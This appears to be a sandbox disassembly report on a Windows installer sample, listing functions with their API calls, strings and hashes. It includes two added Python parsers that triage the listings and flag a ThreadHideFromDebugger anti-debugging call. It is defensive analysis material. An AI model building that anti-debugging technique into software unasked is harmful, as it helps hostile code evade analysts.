                                                            • Instruction ID: caed01070995377cd8f8208fbdd6eccf9873616e5bc5f9f2a10957ac0b136757
                                                            • Opcode Fuzzy Hash: 67b48f57c7f4b646e4a9ee22ae6830ead9206950cdb4320f1b426858709619c3
                                                            • Instruction Fuzzy Hash: 601148B4608350AFD7108F29D54454EBBE4BFC6314F148E59F4A8CBB91E331CC858B22
                                                            APIs
                                                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CBEABA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                                            • API String ID: 2738559852-1563143607
                                                            • Opcode ID: f8440fc47e2323235753538706c7de72dab44638a2c6f5ae528e562e1a004263
                                                            • Instruction ID: 90afdd66205b8eafd8435c8b93ea19d58e3fce6a39972616a07d37fd2bce7886
                                                            • Opcode Fuzzy Hash: f8440fc47e2323235753538706c7de72dab44638a2c6f5ae528e562e1a004263
                                                            • Instruction Fuzzy Hash: 896257706093818FC724CF28C490A5ABBF6ABC9B84F248D1EE999CB751D734D8468F53
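Worked example, added here and not code from the Joe Sandbox report or from the analysed sample: a small Python parser for the "APIs" listing lines above (the `Name.MODULE(arg,...), ref: ADDR` shape, including the "Part of subcall function ADDR:" prefix and the "?" placeholder for arguments the sandbox did not recover), followed by a check that flags the `NtSetInformationThread` call at 6CA93EAA as `ThreadHideFromDebugger` (ThreadInformationClass 0x11), which is the behaviour behind the "Hides threads from debuggers" signature. The sample lines are copied from this report; the 0x40-byte proximity window used to tie the preceding `GetCurrentThread` call to it is an assumption of the example, not something the report states.

```python
"""Parser for the 'APIs' lines of a Joe Sandbox disassembly listing, plus a
check for the ThreadHideFromDebugger anti-debugging call seen in this report.

Added example; not code from the report or from the analysed sample."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Sample input constructed from API lines that appear in this report.
SAMPLE_API_LINES = [
    "• GetCurrentThread.KERNEL32 ref: 6CA93E9D",
    "• NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CA93EAA",
    "• OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC15130",
    "• FindFirstFileA.KERNEL32(?,?), ref: 6CC0AEDC",
    "• ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6CBEABA7",
    "• Part of subcall function 6CC34457: CreateFileW.KERNEL32(00000000,00000000,?,"
    "6CC34115,?,?,00000000,?,6CC34115,00000000,0000000C), ref: 6CC34474",
    "• __dosmaperr.LIBCMT ref: 6CC34187",
]

# Line shape: [Part of subcall function ADDR: ]Name.MODULE[(arg,arg,...)][,] ref: ADDR
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)

THREAD_HIDE_FROM_DEBUGGER = 0x11   # THREADINFOCLASS value; 0x11 is what the sample passes


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]         # None where the sandbox logged '?' (value not recovered)
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set for 'Part of subcall function X' lines


def parse_api_line(line: str) -> ApiCall:
    """Parse one listing line; raises ValueError on anything that is not an API line."""
    text = line.strip().lstrip("•").strip()
    m = API_LINE.match(text)
    if m is None:
        raise ValueError(f"unrecognised API line: {line!r}")
    args: List[Optional[int]] = []
    if m.group("args"):
        for a in m.group("args").split(","):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16))
    sub = m.group("sub")
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)


def flag_hide_from_debugger(calls: List[ApiCall], window: int = 0x40) -> List[dict]:
    """Flag NtSetInformationThread call sites whose ThreadInformationClass is 0x11.

    The logged handle argument is not trusted (GetCurrentThread returns a
    pseudo-handle, and the sandbox logged 0 here); instead a GetCurrentThread
    call within `window` bytes before the call site is taken as evidence that
    the thread being hidden is the caller's own. The window is this example's
    assumption, not a documented constant."""
    by_ref = sorted(calls, key=lambda c: c.ref)
    hits = []
    for i, c in enumerate(by_ref):
        if c.api != "NtSetInformationThread" or len(c.args) < 2:
            continue
        if c.args[1] != THREAD_HIDE_FROM_DEBUGGER:
            continue
        # This information class takes no buffer: ThreadInformationLength must be 0.
        length_ok = len(c.args) >= 4 and c.args[3] == 0
        own_thread = any(p.api == "GetCurrentThread" and 0 < c.ref - p.ref <= window
                         for p in by_ref[:i])
        hits.append({"ref": c.ref, "length_ok": length_ok, "uses_current_thread": own_thread})
    return hits


if __name__ == "__main__":
    parsed = [parse_api_line(l) for l in SAMPLE_API_LINES]
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module} args={c.args} subcall_of={c.subcall_of}")
    for h in flag_hide_from_debugger(parsed):
        print(f"ANTI-DEBUG ThreadHideFromDebugger at {h['ref']:08X}: {h}")
```

Run stand-alone it prints each parsed call and one anti-debug hit at 6CA93EAA with `length_ok` and `uses_current_thread` both true. Feeding it the "APIs" sections of a whole report (one line per `•` entry) gives a quick triage list of which functions carry the thread-hiding call, which is more useful than the signature name alone when several functions share the same fuzzy hash, as the three records above do.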

                                                            Control-flow Graph

                                                            Control-flow graph (rendered as an image; edge data omitted). Basic blocks 6cc2cad3-6cc2ce82; API calls in blocks: GetConsoleMode (6cc2cd57-6cc2cd66), ReadConsoleW (6cc2cd6e-6cc2cd88), GetLastError (6cc2cd8a and 6cc2ce2c-6cc2ce37), ReadFile (6cc2cdb8-6cc2cdd0).
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8Q
                                                            • API String ID: 0-4022487301
                                                            • Opcode ID: 8a59b887585a5d900e154537a261bf8ac5cbbcc01f0a126032ef5e9d32ff6a9e
                                                            • Instruction ID: 953a546f61980a9ddb947b7829fc2719d3195a0cde55fa139997717c6c68b1fd
                                                            • Opcode Fuzzy Hash: 8a59b887585a5d900e154537a261bf8ac5cbbcc01f0a126032ef5e9d32ff6a9e
                                                            • Instruction Fuzzy Hash: 85C11870E04249AFFF01EF99C880BADBBB1BF4A318F204159E514A7B81E779D945CB60

                                                            Control-flow Graph

                                                            Control-flow graph (rendered as an image; edge data omitted). Basic blocks 6cc3406c-6cc34395; API calls in blocks: GetFileType (6cc34192-6cc3419b), GetLastError (6cc34167-6cc3418d, 6cc3419d-6cc341ce together with CloseHandle, 6cc34345-6cc34371), CloseHandle (6cc34310-6cc34343).
                                                            APIs
                                                              • Part of subcall function 6CC34457: CreateFileW.KERNEL32(00000000,00000000,?,6CC34115,?,?,00000000,?,6CC34115,00000000,0000000C), ref: 6CC34474
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC34180
                                                            • __dosmaperr.LIBCMT ref: 6CC34187
                                                            • GetFileType.KERNEL32(00000000), ref: 6CC34193
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3419D
                                                            • __dosmaperr.LIBCMT ref: 6CC341A6
                                                            • CloseHandle.KERNEL32(00000000), ref: 6CC341C6
                                                            • CloseHandle.KERNEL32(6CC2B0D0), ref: 6CC34313
                                                            • GetLastError.KERNEL32 ref: 6CC34345
                                                            • __dosmaperr.LIBCMT ref: 6CC3434C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                            • String ID: 8Q
                                                            • API String ID: 4237864984-4022487301
                                                            • Opcode ID: a3d1ada0d753bccff26361fe1667ef5edceabd568421fea9ecedb92e7e5ee58f
                                                            • Instruction ID: fbe8e34b92d00ae1972f1b59e373781fc1a1f7a193d925640e2929cabbc688c6
                                                            • Opcode Fuzzy Hash: a3d1ada0d753bccff26361fe1667ef5edceabd568421fea9ecedb92e7e5ee58f
                                                            • Instruction Fuzzy Hash: A6A17932A045648FCF09DF68E851BAE7FB1EB07328F185259E815EF781E7368806CB51

Control-flow Graph
[Control-flow graph figure] Function 6cbec1e0-6cbec4d7. Win32 calls in its blocks: WriteFile (three call sites), ReadFile. Internal subcalls: 6cc16b70, 6cc1b3a0, 6cc1b920.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: :uW$;uW$;uW$> 4!$> 4!
                                                            • API String ID: 0-4100612575
                                                            • Opcode ID: 332cd9c033e5f046ee9396af7efe65d9894527ff34b440469f0c19ab343fa906
                                                            • Instruction ID: 282ca65aef271f5e5c404e66e4dfe2440124253c01692dde192e19d0ab76b4a7
                                                            • Opcode Fuzzy Hash: 332cd9c033e5f046ee9396af7efe65d9894527ff34b440469f0c19ab343fa906
                                                            • Instruction Fuzzy Hash: 4A7149B0209385AFD710DF59C880B5ABBF4FF8AB48F10492EF498D6651D771D8489B93
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: K?Jo$K?Jo$`Rlx$7eO
                                                            • API String ID: 0-174837320
                                                            • Opcode ID: e5d122f88cc3ee804ed9f96aec2616b71f5b0910461f650726de632d2ec252cd
                                                            • Instruction ID: 3026505c43ad5948e4b033fe979258ee6dd4724dfa3b070031e774aeae9672bb
                                                            • Opcode Fuzzy Hash: e5d122f88cc3ee804ed9f96aec2616b71f5b0910461f650726de632d2ec252cd
                                                            • Instruction Fuzzy Hash: A34286B86193828FC754CF29C090A1ABBE1EFD9794F248E1EE5A587B20D734D845CB47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ;T55
                                                            • API String ID: 0-2572755013
                                                            • Opcode ID: 172b689fa60c683253d29df9a80bd7e3f24a0c3c2fa426d55b7aa6064851d0e9
                                                            • Instruction ID: 43bf25db9e88f7614a427931ffb4112bde9bd50d558e96e40cb54477a4dfae35
                                                            • Opcode Fuzzy Hash: 172b689fa60c683253d29df9a80bd7e3f24a0c3c2fa426d55b7aa6064851d0e9
                                                            • Instruction Fuzzy Hash: 9103F471645B018FC728CF68C8D0696B7F3AFD532871D8B2DC0A64BA95DB74B48ACB50

Control-flow Graph
[Control-flow graph figure] Function 6cc14ff0-6cc15118. Win32 calls in its blocks: CreateProcessA (entry block 6cc14ff0-6cc15077), then WaitForSingleObject and CloseHandle * 2 in block 6cc15080-6cc150c2. No internal subcalls.
APIs (as named in the graph nodes)
• CreateProcessA.KERNEL32
• WaitForSingleObject.KERNEL32
• CloseHandle.KERNEL32 (two call sites)
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID: D
                                                            • API String ID: 963392458-2746444292
                                                            • Opcode ID: d06bd55a805b0c62f072309d050a0a75e61eb29ac81e3c6b858c3892f5ca2009
                                                            • Instruction ID: fedcb68bfb21d09de621f537dbdbcd60fafe906396717e333681e2b48bd6f378
                                                            • Opcode Fuzzy Hash: d06bd55a805b0c62f072309d050a0a75e61eb29ac81e3c6b858c3892f5ca2009
                                                            • Instruction Fuzzy Hash: 2331027080D3408FE340DF29C19872ABBF0AB8A318F405A1DF49986650E7B5D5898F43
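Each record above gives the same two machine-readable shapes: the flattened control-flow-graph line (block ids, address ranges, edges and the Win32 APIs named inside each block) and the bullet list under "APIs". The helper below is an added example written for this page, not Joe Sandbox code and not code from the sample; it parses both shapes and tags API combinations a reverser would look at first, such as the CreateProcessA / WaitForSingleObject pair in the function at 6cc14ff0 and the CreateFileW / GetFileType pair in the function at 6cc3406c. The sample input is constructed from those two records; the tags and groupings in RULES are this example's assumptions, not fields of the report.

```python
"""Triage helper for the per-function records of a Joe Sandbox disassembly section.

Added example, not Joe Sandbox or sample code. It parses the flattened
`control_flow_graph` line (basic blocks, edges, Win32 APIs named in each block)
and the bullet list printed under "APIs", then flags API combinations that a
reverser would look at first. RULES and its tags are this example's assumptions.
"""
import re
from dataclasses import dataclass, field

# Constructed input, copied from two records in this report (the CreateProcessA
# function at 6cc14ff0 and part of the "APIs" list of the function at 6cc3406c).
SAMPLE_CFG = (
    "control_flow_graph 7579 6cc14ff0-6cc15077 CreateProcessA 7580 6cc150ca-6cc150d3 "
    "7579->7580 7581 6cc150f0-6cc1510b 7580->7581 7582 6cc150d5-6cc150da 7580->7582 "
    "7581->7580 7583 6cc15080-6cc150c2 WaitForSingleObject CloseHandle * 2 7582->7583 "
    "7584 6cc150dc-6cc150e1 7582->7584 7583->7580 7584->7580 7585 6cc150e3-6cc15118 7584->7585"
)
SAMPLE_API_LINES = """\
• Part of subcall function 6CC34457: CreateFileW.KERNEL32(00000000,00000000,?,6CC34115), ref: 6CC34474
• GetLastError.KERNEL32(?,?,?), ref: 6CC34180
• __dosmaperr.LIBCMT ref: 6CC34187
• GetFileType.KERNEL32(00000000), ref: 6CC34193
• CloseHandle.KERNEL32(00000000), ref: 6CC341C6
"""

_EDGE = re.compile(r"^(\d+)->(\d+)$")
_RANGE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)$")
_IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_:]*$")
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_:]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    apis: list = field(default_factory=list)  # [(api_name, call_count), ...]


def parse_cfg(line):
    """Tokens are `<id> <start>-<end>` (new block), `<id>-><id>` (edge), an API name,
    `call <addr>` (intra-module helper, skipped) or `* <n>` (repeat of the last API)."""
    toks = line.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, cur, i = [], [], None, 0
    while i < len(toks):
        t = toks[i]
        edge = _EDGE.match(t)
        rng = _RANGE.match(toks[i + 1]) if t.isdigit() and i + 1 < len(toks) else None
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
        elif rng:
            cur = Block(int(t), int(rng.group(1), 16), int(rng.group(2), 16))
            blocks.append(cur)
            i += 1  # consume the address range
        elif t == "call":
            i += 1  # consume the callee address; not a Win32 API
        elif t == "*" and cur is not None and cur.apis:
            name, _ = cur.apis[-1]
            cur.apis[-1] = (name, int(toks[i + 1]))
            i += 1  # consume the repeat count
        elif cur is not None and _IDENT.match(t):
            cur.apis.append((t, 1))
        i += 1
    return blocks, edges


def parse_api_lines(text):
    """One dict per `• Name.MODULE(args), ref: ADDR` bullet; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        args = [a for a in (m.group("args") or "").split(",") if a]
        calls.append({
            "name": m.group("name"), "module": m.group("mod"), "args": args,
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


# A rule is a list of alternative groups; it fires when every group has a member
# present. The tags and groupings are assumptions chosen for this example.
RULES = {
    "spawns a child process and waits for it": [{"CreateProcessA", "CreateProcessW"}, {"WaitForSingleObject"}],
    "opens a file and checks its handle type": [{"CreateFileA", "CreateFileW"}, {"GetFileType"}],
    "writes to a file or console handle": [{"WriteFile"}],
}


def triage(api_names):
    present = set(api_names)
    return [tag for tag, groups in RULES.items() if all(g & present for g in groups)]


def summarize(cfg_line, api_text=""):
    """Merge APIs from the graph nodes and the "APIs" list, then tag the function."""
    blocks, edges = parse_cfg(cfg_line)
    names = [n for b in blocks for n, cnt in b.apis for _ in range(cnt)]
    names += [c["name"] for c in parse_api_lines(api_text)]
    return {
        "entry": f"{blocks[0].start:08x}" if blocks else None,
        "blocks": len(blocks), "edges": len(edges),
        "apis": sorted(set(names)), "tags": triage(names),
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_CFG))
    print(summarize("", SAMPLE_API_LINES))
```

Subcall targets such as `call 6cc34457` are skipped on purpose: they are intra-module helpers, and the report already attributes their Win32 calls to the caller through the "Part of subcall function" bullets, which `parse_api_lines` keeps in the `subcall` field so the two views can be joined.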

Control-flow Graph
[Control-flow graph figure] Function 6cc2bc5e-6cc2be3f. Win32 calls in its blocks: WriteFile, GetLastError. Internal subcalls: 6cc1f9df, 6cc1f9cc, 6cc20120, 6cc2be40, 6cc2ac69, 6cc2beb1, 6cc2c2c3, 6cc2c25b, 6cc2c487, 6cc2c39e, 6cc1f9f2.
                                                            APIs
                                                              • Part of subcall function 6CC2BEB1: GetConsoleCP.KERNEL32(?,6CC2B0D0,?), ref: 6CC2BEF9
                                                            • WriteFile.KERNEL32(?,?,6CC346EC,00000000,00000000,?,00000000,00000000,6CC35AB6,00000000,00000000,?,00000000,6CC2B0D0,6CC346EC,00000000), ref: 6CC2BDAF
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC346EC,6CC2B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC2BDB9
                                                            • __dosmaperr.LIBCMT ref: 6CC2BDFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                            • String ID: 8Q
                                                            • API String ID: 251514795-4022487301
                                                            • Opcode ID: 19ff57af243fa0c68107a317ce1269e06fbed6156164f401522767f99b430446
                                                            • Instruction ID: 978cd74c9a8119b9ef3c6d389000144299aad2b9009586fc2963a4f131569dd8
                                                            • Opcode Fuzzy Hash: 19ff57af243fa0c68107a317ce1269e06fbed6156164f401522767f99b430446
                                                            • Instruction Fuzzy Hash: 89510771E0420AAFEB01DFA9C850BEEBBB9FF05318F140491D501A7A51F738D94587A0

Control-flow Graph
[Control-flow graph figure] Function 6cc15b90-6cc15d49. No Win32 calls named in its blocks. Internal subcalls: 6cae01f0, 6cc20b18, 6cae2250, 6cae2340, 6cc19379, 6cade010, 6cc17088.
                                                            APIs
                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC15D31
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                            • API String ID: 323602529-1866435925
                                                            • Opcode ID: 962d112e276b6dae4c271dc9214ec5a887be7c8fa55745e30bcbad97c3b9ca9a
                                                            • Instruction ID: 2e52dab4e84f500076d0f4d45baa839841d146121d83c4df8522bc7b30b754a2
                                                            • Opcode Fuzzy Hash: 962d112e276b6dae4c271dc9214ec5a887be7c8fa55745e30bcbad97c3b9ca9a
                                                            • Instruction Fuzzy Hash: 975133B5900B408FD725CF29C585B97BBF1BB48318F008A2DD8864BF91E775B909CB90

Control-flow Graph
[Control-flow graph figure] Function 6cc2b925-6cc2b9c0. Win32 calls in its blocks: CloseHandle, GetLastError. Internal subcalls: 6cc315a2 (three call sites), 6cc3171f, 6cc1f9f2.
                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,6CC3425F), ref: 6CC2B97B
                                                            • GetLastError.KERNEL32(?,00000000,?,6CC3425F), ref: 6CC2B985
                                                            • __dosmaperr.LIBCMT ref: 6CC2B9B0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                            • String ID:
                                                            • API String ID: 2583163307-0
                                                            • Opcode ID: dee9d80c17a8a1027c0b928da6dab82481e0a750a9c2c2fee79b49175c85fc8b
                                                            • Instruction ID: 610643b0b4eb43143dde581ce651eb720d1cfcf4577f4d81ff451850e231c742
                                                            • Opcode Fuzzy Hash: dee9d80c17a8a1027c0b928da6dab82481e0a750a9c2c2fee79b49175c85fc8b
                                                            • Instruction Fuzzy Hash: 81012B33A491201ED301773EA46579D77B94F8773CF294359E91B87AC1FB68C8459390

Control-flow Graph
[Control-flow graph figure] Function 6cc20b9c-6cc20c12. No Win32 calls named in its blocks. Internal subcalls: 6cc1f9cc, 6cc20120, 6cc2ae75, 6cc20cb9, 6cc2873e, 6cc29c60, 6cc2b898, 6cc247bb.
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
• Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
• Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
